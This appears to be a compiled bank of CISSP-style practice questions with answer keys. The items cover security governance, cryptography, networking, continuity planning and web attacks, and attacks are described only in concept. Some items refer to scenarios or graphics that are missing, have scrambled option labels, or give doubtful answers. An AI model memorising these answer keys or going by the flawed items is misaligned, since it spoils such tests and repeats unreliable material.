B. The information risk management (IRM) policy should map to all of the items listed except specific physical controls. Policies should not specify any type of controls, whether they are administrative, physical, or technical.

Which of the following best describes "change control?" A. It is a systematic approach to deliberately regulating the changing nature of projects. B. It is the process of controlling the specific changes that take place during the life cycle of a system. C. It is an enterprise program for instituting programmatic changes in source code repositories. D. It is the process of controlling how changes to firewalls and other network devices are made.

B. The key words here are "specific changes" and "life cycle." Change control dictates that changes to a system over the course of its operation and maintenance (O&M) must be approved, documented, and tested according to a rigorous process. This is to ensure that such changes, whether they be mere alterations of configurations or sweeping code revisions, do not adversely impact either the system's capabilities or the security controls they implement or depend upon.

When classifying information, it's sensitivity refers to: A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable. B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals. C. The ways in which an organization protects it's information from third parties. D. The ways in which an organization protects its information from internal abuse.

B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals.

All of the following are steps in the security audit process except A. Document the results. B. Convene a management review. C. Involve the right business unit leaders. D. Determine the scope.

B. The management review is not a part of any audit. Instead, this review typically uses the results of one or more audits in order to make strategic decisions.

During development, testing, and maintenance of the disaster recovery and continuity plan, a high degree of interaction and communication is crucial to the process. why? A. This is a regulatory requirement of the process. B. The more people talk about it and get involved, the more awareness will increase. C. this is not crucial to the plan and should not be interactive because it will most likely affect operations. D. Management will more likely support it.

B. The more people talk about it and get involved, the more awareness will increase.

Frank is a new security manager for a large financial institution. He has been told that the organization needs to reduce the total cost of ownership for many components of the network and infrastructure. The organization currently maintains many distributed networks, software packages, and applications. Which of the following best describes the cloud services that are most likely provided by service providers for Frank to choose from? A. Infrastructure as a Service provides an environment similar to an operating system, Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality. B. Infrastructure as a Service provides an environment similar to a data center, Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality. C. Infrastructure as a Service provides an environment similar to a data center, Platform as a Service provides application-based functionality, and Software as a Service provides specific operating system functionality. Infrastructure as a Service provides an environment similar to a database, D. Platform as a Service provides operating systems and other major processing platforms, and Software as a Service provides specific application-based functionality.

B. The most common cloud service models are Infrastructure as a Service (IaaS) Cloud providers offer the infrastructure environment of a traditional data center in an on-demand delivery method. Platform as a Service (PaaS) Cloud providers deliver a computing platform, which can include an operating system, database, and web server as a holistic execution environment. Software as a Service (SaaS) Provider gives users access to specific application software (CRM, e-mail, games).

The BCP coordinator, working with management, should determine which of the following? A. The optimum point to discover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions. B. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions. C. The optimum point to recover the information system while balancing the cost of system inoperability against the value of resources required for restoring the system and its overall support for critical mission/business functions. D. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support of critical mission/business costs.

B. The optimum point to recover the information system while balancing the cost of system inoperability against the cost of resources required for restoring the system and its overall support for critical mission/business functions.

John and his team are conducting a penetration test of a client's network. The team will conduct its testing armed only with knowledge it acquired from the Web. The network staff is aware that the testing will take place, but the penetration testing team will only work with publicly available data and some information from the client. What is the degree of the team's knowledge, and what type of test is the team carrying out? A. Full knowledge; blind test B. Partial knowledge; blind test C. Partial knowledge; double-blind test D. Zero knowledge; targeted test

B. The penetration testing team can have varying degrees of knowledge about the penetration target before the tests are actually carried out. These degrees of knowledge are zero knowledge, partial knowledge, and full knowledge. John and his team have partial knowledge; the team has some information about the target. Tests may also be blind, double-blind, or targeted. John's team is carrying out a blind test, meaning that the network staff knows that the test will take place.

ACME, Inc., paid a software vendor to develop specialized software, and that vendor has gone out of business. ACME, Inc., does not have access to the code and therefore cannot keep it updated. What mechanism should the company have implemented to prevent this from happening? A. Reciprocal agreement B. Software escrow C. Electronic vaulting D. Business interruption insurance

B. The protection mechanism that ACME, Inc., should have implemented is called software escrow. Software escrow means that a third party holds the source code and backups of the compiled code, manuals, and other supporting materials. A contract between the software vendor, customer, and third party outlines who can do what and when with the source code. This contract usually states that the customer can have access to the source code only if and when the vendor goes out of business, is unable to carry out stated responsibilities, or is in breach of the original contract. If any of these activities takes place, then the customer is protected because it can still gain access to the source code and other materials through the third-party escrow agent.

Which of the following is the best single sign-on technology for this situation? A. PKI B. Kerberos C. RADIUS D. TACACS+

B. The scenario specifies that PKI cannot be used, so the first option is not correct. Kerberos is based upon symmetric cryptography; thus, it does not need a PKI. RADIUS and TACACS+ are remote centralized access control protocols.

Who or what determines if an organization is going to operate under a discretionary, mandatory, or nondiscretionary access control model? A. Administrator B. Security policy C. Culture D. Security levels

B. The security policy sets the tone for the whole security program. It dictates the level of risk that management and the company are willing to accept. This in turn dictates the type of controls and mechanisms to put in place to ensure this level of risk is not exceeded.

What are the three major elements crucial to the security of software development environments? A. The software languages, the integrated development environments (IDEs), and the compilers B. The development platforms, the code repositories, and the software configurations C. The design teams, the development teams, and the testing teams D. The code repositories, the versioning systems, and the deployment processes

B. The security posture of development platforms, code repositories, and software configurations are the three overarching concerns for any software development environment. These determine the security of the entire life cycle of a development program, from how and where software is constructed, to how and where it is stored, through the state it is in as deployed.

When a system is said to be operating in "problem state" what does this mean? A. The system is using Rings 0 and 1. B. The system is executing an application. C. The system is in a fault state. D. The system is in a ready state.

B. The system is executing an application.

Claudia is the CISO for a global financial institution, overseeing the security of hundreds of millions of bank accounts. Which of the three main security principles should she consider most important when prioritizing the controls her enterprise should deploy? A. Confidentiality B. Integrity C. Availability D. Authenticity

B. The three main security principles for any and all security controls are availability, integrity, and confidentiality (AIC). Clearly each of these is a concern for Claudia's organization's security. However, among these, the integrity of the account data is foremost. Integrity is the assurance that the bank account data has not been altered in an unauthorized way. A compromise of this principle could essentially mean that the account holders' money has been stolen—that the bank has been robbed.

52 There are two main types of symmetric ciphers: stream and block. Which of the following is not an attribute of a good stream cipher? A.Statistically unbiased keystream B.Statistically predictable C.Long periods of no repeating patterns D. Keystream not linearly related to key

B. The two main types of symmetric algorithms are block ciphers and stream ciphers. A block cipher performs mathematical functions on blocks of bits at a time. A stream cipher, on the other hand, does not divide a message into blocks. Instead, a stream cipher treats the message as a stream of bits and performs mathematical functions on each bit individually. Good stream ciphers offer the following: unpredictable statistical results, long periods of no repeating patterns, a statistically unbiased keystream, and a keystream that is not linearly related to the key. If a stream cipher is statistically predictable, then it will be possible for an attacker to uncover the key and break the cipher.

Data backup verification efforts should A. Have the smallest scope possible B. Be based on the threats to the organization C. Maximize impact on business D. Focus on user data

B. The verification of data backups should focus on assessing the organization's ability to respond to the threats identified during the threat modeling and risk management processes. If the organization can't respond to these threats, then its backups may be useless.

What is the definition of an algorithm's work factor? A. The time it takes to encrypt and decrypt the same plaintext B. The time it takes to break the encryption C. The time it takes to implement 16 rounds of computation D. The time it takes to apply substitution functions

B. The work factor of a cryptosystem is the amount of time and resources necessary to break the cryptosystem or its encryption process. The goal is to make the work factor so high that an attacker could not be successful in breaking the algorithm or cryptosystem.

This graphic covers which of the following? A. Crossover error rate B. Identity verification C. Authorization rates D. Authentication error rates.

B. These steps are taken to convert the biometric input for identity verification: i.A software application identifies specific points of data as match points. ii.An algorithm is used to process the match points and translate that information into a numeric value. iii. Authentication is approved or denied when the database value is compared with the end user input entered into the scanner.

Why are biometric systems considered more accurate than many of the other types of authentication technologies in use today? A. They are less accurate. B. They are harder to circumvent than other mechanisms. C. Biometric systems achieve high CER values. D. They have less Type 1 errors than Type II errors.

B. They are harder to circumvent than other mechanisms.

What is the most significant aspect of buffer overflow vulnerabilities? A. They are the result of coding errors that can easily occur in just about any software. B. They can commonly be successfully attacked remotely, resulting in malicious code executing within the same security context as the local process being compromised. C. They can exist in common code libraries, rendering many applications that depend on these libraries vulnerable as well. D. Good coding practices can make them far less commong.

B. They can commonly be successfully attacked remotely, resulting in malicious code executing within the same security context as the local process being compromised.

Which of the following is a correct description of the pros and cons associated with third-generation programming languages? A. The use of heuristics reduced programming effort, but the amount of manual coding for a specific task is usually more than the preceding generation. B. The use of syntax similar to human language reduced development time, but the language is resource intensive. C. The use of binary was extremely time consuming but resulted in fewer errors. D. The use of symbols reduced programming time, but the language required knowledge of machine architecture.

B. Third-generation programming languages are easier to work with compared to earlier languages because their syntax is similar to human languages. This reduces program development time and allows for simplified and swift debugging. However, these languages can be very resource intensive when compared to the second-generation programming languages.

Tim recently started working at an organization with no defined security processes. One of the areas he'd like to improve is software patching. Consistent with the organizational culture, he is considering a decentralized or unmanaged model for patching. Which of the following is not one of the risks his organization would face with such a model? A. This model typically requires users to have admin credentials, which violates the principle of least privilege. B. It will be easier to ensure that all software is updated, since they will be configured to do so automatically. C. It may be difficult (or impossible) to attest to the status of every application in the organization. D. Having each application or service independently download the patches will lead to network congestion.

B. This option is not a risk, but a (probably unrealistic) benefit, so it cannot be the right answer. The other three options are all risks associated with an unmanaged patching model.

Miranda has been directed to investigate a possible violation of her organization's acceptable use policy (AUP) by a coworker suspected of running cryptocurrency mining software on his desktop system. Which of the following is NOT a very likely scenario that could arise during her investigation? A. During the course of her investigation, B. Miranda discovered that her coworker was also downloading and storing pornographic images, many of which appeared to involve minors. What began as an administrative investigation became a criminal one. Miranda was able to find evidence that appeared to corroborate the intentional use of illicit software to mine cryptocurrency using corporate resources (mainly CPU and power). As a result, Miranda's coworker was charged with a criminal violation of the Computer Fraud and Abuse Act (CFAA). B. As a result of Miranda's investigation, her coworker was terminated for violating the AUP. However, he hired an attorney and sued the company for wrongful dismissal based on knowledge that other employees were also running cryptocurrency mining software but went unpunished. Her administrative case became a civil one. D. Compelling evidence was found of a significant AUP violation, resulting in termination. However, during the subsequent wrongful dismissal suit (as described in option C), it was discovered that Miranda had not anticipated a court case, and so had not properly obtained or preserved the evidence. Consequently, the judge found summarily for the plaintiff, who got his job back along with compensatory damages.

B. Though it could be argued that the employee in question had exceeded his intended, authorized access to a company computer and used it to steal corporate resources (computing and electrical power), the severity of such actions is unlikely to rise to the level of a criminal indictment under the CFAA, particularly as a single instance.

Which of the following best describes the approach Frank has shown his team as outlined in the scenario? A. Attack surface analysis B. Threat modeling C. Penetration testing D. Double-blind penetration testing

B. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is a description of a set of security aspects that can help define a threat and a set of possible attacks to consider. It may be useful to define different threat models for one software product. Each model defines a narrow set of possible attacks to focus on. A threat model can help to assess the probability, the potential harm, and the priority of attacks, and thus help to minimize or eradicate the threats.

What is the definition of an algorithm's work factor? A. time it to takes to encrypt and decrypt the same plaintext. B. Time it takes to break encryption. C. time it takes to implement 16 rounds of computation. D. time it takes to apply substitution functions.

B. Time it takes to break encryption.

Mike, who was a help desk support person, has recently been moved into the position of security awareness trainer. What is the purpose of mike's new position? A. to provide senior management with proof that they exercised due care and due diligence. B. To ensure that all employees are well versed on the company's security policy and program. C. To meet regulatory compliances. D. To oversee the training department and serve as quality control.

B. To ensure that all employees are well versed on the company's security policy and program.

Which of the following best describes ethernet transmissions over a LAN? A. Traffic is sent to a gateway that sends it to the destination system. B. Traffic is bursty in nature and broadcasts data to all hosts on the subnet. C. Traffic streams and does not broadcast data. D. Traffic is contained within collision domains but not broadcast domains.

B. Traffic is bursty in nature and broadcasts data to all hosts on the subnet.

An online banking program may allow a customer to view his account balance, but may not allow the customer to transfer money until he has a certain security level or access right. What type of access control is being used? A. timing. B. Transaction. C. Administrative D. Physical.

B. Transaction.

An online banking program may allow a customer to view his account balance, but may not allow the customer to transfer money until he has a certain security level or access right. What type of access control is being used? A. timing. B. Transaction. C Administrative. D. Physical.

B. Transaction.

Referring to the TCP/IP model, which layer's protocols are missing from the following list: SMTP, 802.11, and IPv6? A. Application. B. Transport C. Internet D. Data Link.

B. Transport

Which of the following is not part of user provisioning? A. Creation and deactivation of user accounts B. Business process implementation C. Maintenance and deactivation of user objects and attributes D. Delegating user administration

B. User provisioning refers to the creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes. User provisioning software may include one or more of the following components: change propagation, self-service workflow, consolidated user administration, delegated user administration, and federated change control. User objects may represent employees, contractors, vendors, partners, customers, or other recipients of a service. Services may include electronic mail, access to a database, access to a file server or mainframe, and so on.

Which of the following can take place if an attacker can insert tagging values into network- and switch-based protocols with the goal of manipulating traffic at the data link layer? A. Open relay manipulation B. VLAN hopping attack C. Hypervisor denial-of-service attack D. Smurf attack

B. VLAN hopping attacks allow attackers to gain access to traffic in various VLAN segments. An attacker can have a system act as though it is a switch. The system understands the tagging values being used in the network and the trunking protocols, and can insert itself between other VLAN devices and gain access to the traffic going back and forth. Attackers can also insert tagging values to manipulate the control of traffic at this data link layer.

Vulnerability scans normally involve all of the following except A. The identification of active hosts on the network B. The identification of malware on all hosts C. The identification of misconfigured settings D. The identification of operating systems

B. Vulnerability testing does not normally include scanning hosts for malware. Instead, it focuses on finding flaws that malware could potentially exploit.

Eve needs to decide upon a development method for a new project. Unbeknownst to her employer, she is an evil double agent working for their competitor, seeking to scuttle the effort. Which of the following methodologies should she select to best ensure her secret goal? A. Spiral. B. Waterfall. C. Agile. D. Prototyping.

B. Waterfall.

Hannah has been assigned the task of installing web access management (WAM) software. What is the best description for what WAM is commonly used for? A. Control external entities requesting access through X.500 databases B. Control external entities requesting access to internal objects C. Control internal entities requesting access through X.500 databases D. Control internal entities requesting access to external objects

B. Web access management (WAM) software controls what users can access when using a web browser to interact with web-based enterprise assets. This type of technology is continually becoming more robust and experiencing increased deployment. This is because of the increased use of e-commerce, online banking, content providing, web services, and more. The basic components and activities in a web access control management process are as follows: 1. User sends in credentials to web server. 2. Web server requests the WAM platform to authenticate the user. WAM authenticates against the 3. LDAP directory and retrieves authorizations from the policy database. 3. User requests to access a resource (object). 4. Web server verifies that object access is authorized and allows access to the requested resource.

Karen wants her team to develop software that allows her company to take advantage of and use many of the web services currently available by other companies. Which of the following best describes the components that need to be in place and what their roles are? A. Web service provides the application functionality. Universal Description, Discovery, and Integration describes the web service's specifications. The Web Services Description Language provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. B. Web service provides the application functionality. The Web Services Description Language describes the web service's specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. C. Web service provides the application functionality. The Web Services Description Language describes the web service's specifications. The Simple Object Access Protocol provides the mechanisms for web services to be posted and discovered. Universal Description, Discovery, and Integration allows for the exchange of messages between a requester and provider of a web service. D. Web service provides the application functionality. The Simple Object Access Protocol describes the web service's specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Web Services Description Language allows for the exchange of messages between a requester and provider of a web service.

B. Web service provides the application functionality. WSDL describes the web service's specifications. UDDI provides the mechanisms for web services to be posted and discovered. SOAP allows for the exchange of messages between a requester and provider of a web service.

There are different ways of providing integrity and authentication within cryptography. What type of technology is shown in the graphic that follows? A. One-way hash B. Digital signature C. Birthday attack D. Collision

B. When a hash algorithm is applied to a message, it produces a message digest, and this value is signed with a private key to produce a digital signature. It provides authentication, data integrity, and nonrepudiation. The act of signing is the actual encryption of the value with the private key. When Maureen receives the message, she will perform the hashing function on the message and come up with her own hash value. Then she will decrypt the sent hash value (digital signature) with Kevin's public key. She then compares the two values, and if they are the same, she can be sure the message was not altered during transmission. She is also sure the message came from Kevin because the value was encrypted with his private key.

When is the emergency state actually over for a company? A.When all people are safe and accounted for. B. When all operations and people are moved back into the primary site. C. When operations are safely moved to the off-site facility. D. When a civil official declares that all is safe.

B. When all operations and people are moved back into the primary site.

Stephanie has been put in charge of developing incident response and forensics procedures her company needs to carry out if an incident occurs. She needs to ensure that their procedures map to the international principles for gathering and protecting digital evidence. She also needs to ensure that if and when internal forensics teams are deployed, they have labels, tags, evidence bags, cable ties, imaging software, and other associated tools. Which of the following best describes what Stephanie needs to build for the deployment teams? A. Local and remote imaging system B. Forensics field kit C. Chain of custody procedures and tools D. Digital evidence collection software

B. When forensics teams are deployed to investigate a potential crime, they should be properly equipped with all of the tools and supplies needed. The following are some of the common items in the forensics field kits: Documentation tools: tags, labels, and timelined forms Disassembly and removal tools: antistatic bands, pliers, tweezers, screwdrivers, wire cutters, and so on Package and transport supplies: antistatic bags, evidence bags and tape, cable ties, and others

Mark is a security administrator who is responsible for purchasing new computer systems for a co-location facility his company is starting up. The company has several time-sensitive applications that require extensive processing capabilities. The co-location facility is not as large as the main facility, so it can only fit a smaller number of computers, which still must carry the same processing load as the systems in the main building. Which of the following best describes the most important aspects of the products Mark needs to purchase for these purposes? A. Systems must provide symmetric multiprocessing capabilities and virtualized environments. B. Systems must provide asymmetric multiprocessing capabilities and virtualized environments. C. Systems must provide multiprogramming multiprocessing capabilities and virtualized environments. D. Systems must provide multiprogramming multiprocessing capabilities and symmetric multiprocessing environments.

B. When systems provide asymmetric multiprocessing, this means multiple CPUs can be used for processing. Asymmetric indicates the capability of assigning specific applications to one CPU so that they do not have to share computing capabilities with other competing processes, which increases performance. Since a smaller number of computers can fit in the new location, virtualization should be deployed to allow for several different systems to share the same physical computer platforms.

While Disaster Recovery Planning (DRP) and Business Continuity Planning (BCP) are directed at the development of "plans," _____ is the holistic management process that should cover both of them. It provides a framework for integrating resilience with the capability for effective responses that protects the interests of the organization's key stakeholders. A. continuity of operations B. business continuity management C. risk management D. enterprise management architecture

B. While DRP and BCP are directed at the development of "plans," business continuity management (BCM) is the holistic management process that should cover both of them. BCM provides a framework for integrating resilience with the capability for effective responses in a manner that protects the interests of the organization's key stakeholders. The main objective of BCM is to allow the organization to continue to perform business operations under various conditions. BCM is the overarching approach to managing all aspects of BCP and DRP.

Mandy needs to calculate how many keys must be generated for the 260 employees using the company's PKI asymmetric algorithm. How many keys are required? A. 33,670 B. 520 C. 67,340 D. 260

B. With asymmetric algorithms, every user must have at least one pair of keys (private and public). In public key systems, each entity has different keys, or asymmetric keys. The two different asymmetric keys are mathematically related. If a message is encrypted by one key, the other key is required in order to decrypt the message. The formula for determining the number of keys needed in this environment is N × 2, which is the number of people (N) multiplied by the number of keys each person would need (2). In a public key system, the pair of keys is made up of one public key and one private key. The public key can be known to everyone, and the private key must be known and used only by the owner.

Why is the issue of data remanence sometimes problematic? A. Data retention policies don't usually specify when data should be deleted. B. With most file systems, deleting data doesn't ensure that it cannot be recovered. C. With most modern file systems, accidentally overwriting a small part of a file makes the remaining remnants unrecoverable. D. Physical destruction is the only way to ensure data cannot be recovered, and this is usually too prohibitively expensive.

B. With most file systems, deleting data doesn't ensure that it cannot be recovered.

Cross-site scripting (XSS) is an application security vulnerability usually found in web applications. What type of XSS vulnerability occurs when a victim is tricked into opening a URL programmed with a rogue script to steal sensitive information? A. Persistent XSS vulnerability B. Nonpersistent XSS vulnerability C. Second-order vulnerability D. DOM-based vulnerability

B. XSS attacks enable an attacker to inject their malicious code into vulnerable web pages. When an unsuspecting user visits the infected page, the malicious code executes on the victim's browser and may lead to stolen cookies, hijacked sessions, malware execution, or bypassed access control or aid in exploiting browser vulnerabilities. There are three different XSS vulnerabilities: persistent, nonpersistent, and DOM-based. A nonpersistent vulnerability (also called a reflected vulnerability) occurs when an attacker tricks the victim into opening a URL programmed with a rogue script to steal the victim's sensitive information, such as a cookie or session ID. The principle behind this attack lies in exploiting the lack of proper input or output validation on dynamic websites. An XSS attack such as this can potentially cause damage on a huge scale. The stolen cookies can lead to compromised web mail systems, flooded blogs, and disclosed bank accounts. Most of the phishing attacks are caused by XSS vulnerabilities.

The OSI model specifies which layers, from top to bottom? A. application, transport, internet, network B. application, presentation, session, transport, network, data link, physical. C. network, internet, transport, application. D. physical, data link, network, transport, session, presentation, application.

B. application, presentation, session, transport, network, data link, physical.

lacy's manager has tasked her with researching an intrusion detection system for a new dispatching center. lacy identifies the top five products and compares their ratings. which of the following is the evaluation criteria framework most in use today for these types of purposes? A itsec B. common criteria C. Red Book. D. Orange Book

B. common criteria

"Shoulder surfing" is an example of what kind of security failure? A. social engineering. B. confidentiality C. countermeasure D. Policy.

B. confidentiality

In which of the following system modes does the application manage the CPUs resources? A. operative mode B. cooperative mode C. Single-unit mode D. Program-specific mode

B. cooperative mode

which of the following are correct charachteristics of object linking and embedding database? i. it's a replacement for ODBC, extending its feature set to support a wider variety of nonrelational databases, such as object databases and spreadsheets that do no necessarily implement sql. ii a set of com-based interfaces provide applications with uniform access to data stored in diverse data sources. ii because it is com-based, ole db is limited to use by microsoft windows-based client tools. iv. it allows different application access different types and sources of data.

B. i, ii, iii, iv

Just about every company today has begun the practice of allowing corporate information to be accessed via the internet. While this is considered a step in the right direction for some business needs, it also creates security vulnerabilities. Which of the following solutions would be the best choice when setting up e-commerce within an organization? A. implementing a DMZ with dual-homed firewalls and two proxy servers. B. implementing a three-tiered application architecture. C. Using an isolated web server to store data. D. Implementing strict security policies on the devices holding the data.

B. implementing a three-tiered application architecture.

Which of the following is a component of an expert system that matches facts against patterns and determines which rules are acceptable? A. Knowledge base. B. inference machine. C. DCE. D. Automatic logical processing.

B. inference machine.

input/output device management is important for what reason? A. invoking deadlock situations. B. insuring the ready availability of resources. C. Creating virtual memory D. Avoiding buffer overflows.

B. insuring the ready availability of resources.

Which of the following does IAB consider unethical behavior? A. internet users who conceal unauthorized accesses. B. internet users who waste computer resources. C. internet users who write viruses. D. internet users who monitor traffic.

B. internet users who waste computer resources.

How is virtual storage created? A. it is a combination of primary and secondary storage. B. it is a combination of RAM and secondary storage. C. it is a combination of real storage and secondary storage. D. it is a combination of RAM and EPROM memory.

B. it is a combination of RAM and secondary storage.

Karen and her security team have been tasked with developing a security policy to be presented to senior management for a new start-up organization. Of the factors listed below, which is the most important in deterring an effective security policy. A. The cost/rate-of-return factor. B. it is consistent with the mission of the company. C.. It reflects each person on the security team D. it concentrates on the assets closet to the CEOs heart.

B. it is consistent with the mission of the company.

Why is computer-generated documentation usually considered non reliable evidence? A. it is primary evidence. B. it is too difficult to delete prior modifications C. it is corroborative evidence. D. It is not covered under criminal law, it is covered under civil law.

B. it is too difficult to delete prior modifications

Hiring new employees requires strict controls that must be constantly reviewed and audited. Which of the following controls would not be associated with personnel hiring? A. Background checks B. least Privilege C. Drug Screen D. NDA

B. least Privilege

What feature enables code to be executed without the usual security checks? A. ring 0 B. maintenance hook C. timing channel D. ready state.

B. maintenance hook

The purpose of initiating emergency procedures right after a disaster takes place is to prevent loss of life and injuries, and to _______________. A. secure the area to ensure that no looting or fraud takes place B. mitigate further damage C. protect evidence and clues D. investigate the extent of the damages

B. mitigate further damage

Which of the following incorrectly describes steganography? A. it is a type of security through obscurity. B. modifying the most significant bit is the most common method used. C. Steganography does not draw attention to itself like encryption does. D. Media files are ideal for steganographic transmission because of their large size.

B. modifying the most significant bit is the most common method used.

John has to create a team to carry out a business impact analysis and develop the company's business continuity plan. Which of the following should not be on the team? i. Business units. ii. Senior Management. iii. IT department. iv. Security Department. V. Communications Department. Vi. Legal Department. A. V B. None of them. C. Al.l of them. D. i

B. none of them.

Who has the primary responsibility of determining the classification level for information? A. senior management. B. owner. C. User. D. Functional Manager.

B. owner.

Kevin changes his e-mail header so that Kim thinks his message is coming from an IT administrator who is asking for her private account information. This attack could be characterized as all of the following except: A. spoofing B. passive C. Masquerading D. Social engineering.

B. passive

Which of the following is a role for users in data asset security? A. Deciding how to adhere to defined security controls. B. performing duties within their responsibility. C. Ensuring they have the necessary level of access to perform their duties. D. Ensuring their role is responsibly defined.

B. performing duties within their responsibility.

Which of the following is a role for users in data asset security? A. Deciding how to adhere to defined security controls. B. performing duties within their responsibility. C. Ensuring they have the necessary level of access to perform their duties. D. Ensuring their role is responsibly defined.

B. performing duties within their responsibility.

All of the following are examples of operational controls except: A. backup and recovery. B. policy development. C. media controls D. proper destruction of data at the end of i's lifetime.

B. policy development.

What is the primary purpose of using one-way encryption on user passwords? A. minimizes the amount of primary and secondary storage needed to store passwords. B. prevents anyone from reading passwords in plaintext. C. Avoids excessive processing required by an asymmetric algorithm. D. prevents replay attacks.

B. prevents anyone from reading passwords in plaintext.

Which of the following occurs in a pki environment? A. The RA creates the certificate, and the CA signs it. B. the CA signs the certificate. C. The RA signs the certificate. D. The user signs the certificate.

B. the CA signs the certificate.

In the modern era, are paper records still a significant concern in the protection of enterprise data assets? if so, why? if not, why not? A. yes, because the most sensitive data is usually only stored in printed form. B.Yes, because printed copies are still commonly produced, are more difficult to track, and are commonly not disposed of properly C. no, because the amount of sensitive data that is ever printed out is exceptionally small by comparison. D. no, because sensitive data that is printed that is printed out is the easiest to properly destroy.

B.Yes, because printed copies are still commonly produced, are more difficult to track, and are commonly not disposed of properly

Which of the following incorrectly describes how routing commonly takes place on the Internet? A. EGP is used in the areas "between" each AS. B. Regions of nodes that share characteristics and behaviors are called ASs. C. CAs are specific nodes that are responsible for routing to nodes outside of their region. D. Each AS uses IGP to perform routing functionality.

C. A CA, or certificate authority, is a trusted third party that provides digital certificates for use in a public key infrastructure. CAs have nothing to do with routing. A PKI environment provides a hierarchical trust model but does not deal with routing of traffic.

Which of the following best describes why classless interdomain routing (CIDR) was created? A. To allow IPv6 traffic to tunnel through IPv4 networks B. To allow IPSec to be integrated into IPv4 traffic C. To allow an address class size to meet an organization's need D. To allow IPv6 to tunnel IPSec traffic

C. A Class B address range is usually too large for most companies, and a Class C address range is too small, so CIDR provides the flexibility to increase or decrease the class sizes as necessary. CIDR is the method to specify more flexible IP address classes.

Why has the frequency of successful brute-force attacks increased? A. The use of permutations and transpositions in algorithms has increased. B. As algorithms get stronger, they get less complex, and thus more susceptible to attacks. C. Processor speed and power have increased. D. Key length reduces over time.

C. A brute-force attack is resource intensive. It tries all values until the correct one is obtained. As computers have more powerful processors added to them, attackers can carry out more powerful brute-force attacks.

Tom works at a large retail company that recently deployed radio-frequency identification (RFID) to better manage its inventory processes. Employees use scanners to gather product-related information instead of manually looking up product data. Tom has found out that malicious customers have carried out attacks on the RFID technology to reduce the amount they pay on store items. Which of the following is the most likely reason for the existence of this type of vulnerability? A. The company's security team does not understand how to secure this type of technology. B. The cost of integrating security within RFID is cost-prohibitive. C. The technology has low processing capabilities and encryption is very processor intensive. D. RFID is a new and emerging technology, and the industry does not currently have ways to secure it.

C. A common security issue with RFID is that the data can be captured as it moves from the tag to the reader and modified. While encryption can be integrated as a countermeasure, it is not common because RFID is a technology that has low processing capabilities and encryption is very processor intensive.

Doors configured in fail-safe mode assume what position in the event of a power failure? A. Open and locked B. Closed and locked C. Closed and unlocked D. Open

C. A company must decide how to handle physical access control in the event of a power failure. In fail-safe mode, doorways are automatically unlocked. This is usually dictated by fire codes to ensure that people do not get stuck inside of a burning building. Fail-secure means that the door will default to lock.

Database views provide what type of security control? A. Detective B. Corrective C. Preventive D. Administrative

C. A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

In cryptography, different steps and algorithms provide different types of security services. Which of the following provides only authentication, nonrepudiation, and integrity? A.Encryption algorithm B.Hash algorithm C.Digital signature D. Encryption paired with a digital signature

C. A digital signature is a hash value that has been encrypted with the sender's private key. The act of signing means encrypting the message's hash value with a private key. A message can be digitally signed, which provides authentication, nonrepudiation, and integrity. The hashing function ensures the integrity of the message, and the signing of the hash value provides authentication and nonrepudiation.

What is used to create a digital signature? A. The receiver's private key B. The sender's public key C. The sender's private key D. The receiver's public key

C. A digital signature is a message digest that has been encrypted with the sender's private key. A sender, or anyone else, should never have access to the receiver's private key.

What is a pretext? A. A false scenario presented to an employee by management with the intent to socially engineer the employee into better performance of their duties. B. Textual information designed to facilitate future instant messaging. C. A false scenario presented to an employee by an attacker with the intent to socially engineer the employee into violating security controls on the attacker's behalf. D. The banner information presented via a text-based protocol to the body of the message.

C. A false scenario presented to an employee by an attacker with the intent to socially engineer the employee into violating security controls on the attacker's behalf.

Which of the following is a cost-effective countermeasure that Don's team should implement? A. Stateful firewall B. Network address translation C. SYN proxy D. IPv6

C. A half-open attack is a type of DoS that is also referred to as a SYN flood. To thwart this type of attack, Don's team can use SYN proxies, which limit the number of open and abandoned network connections. The SYN proxy is a piece of software that resides between the sender and receiver, and only sends TCP traffic to the receiving system if the TCP handshake process completes successfully.

Which best describes a quantitative risk analysis? A. A scenario-based analysis to research different security threats B. A method used to apply severity levels to potential loss, probability of loss, and risks C. A method that assigns monetary values to components in the risk assessment D. A method that is based on gut feelings and opinions

C. A method that assigns monetary values to components in the risk assessment

Within the realm of network components, what are "endpoints" and why do they pose such difficult security challenges? A. Endpoints are the client systems on a network. Because they establish connections to both internal and external servers, their activities can be difficult to monitor and control, and downloads of malicious software into the environment are commonplace. B. Endpoints are the servers to which all the clients connect for authentication, file sharing, and other services. Due to the high volume of connections they support, it can be difficult to monitor and detect malicious activity directed at them, buried among the normal activities. C. Endpoints are everything except the network communication devices, including desktops, servers, mobile devices, and other embedded systems. The management challenges they pose include intermittent connectivity, lack of management infrastructure for some platforms, and the unavailability of software updates for others. D. Endpoints are primarily desktop and mobile systems, which may or may not exist statically on the network. As a result, keeping track of them in order to maintain up-to-date patching and proper configuration can be difficult.

C. A network "endpoint" is anything and everything that is not an infrastructure device. In an Active Directory environment, both desktops and servers may have a robust management and patching regime. However, other endpoints include printers, mobile devices, point of sale (POS) systems, Internet of Things (IoT) devices, and industrial control system (ICS) devices like heating, ventilation, and air conditioning (HVAC) controllers. For many of these platforms, there may simply be no enterprise-scale management infrastructure available, and patching against known vulnerabilities may not be possible.

Brian has been asked to work on the virtual directory of his company's new identity management system. Which of the following best describes a virtual directory? A. Meta-directory B. User attribute information stored in an HR database C. Virtual container for data from multiple sources D. A service that allows an administrator to configure and manage how identification takes place

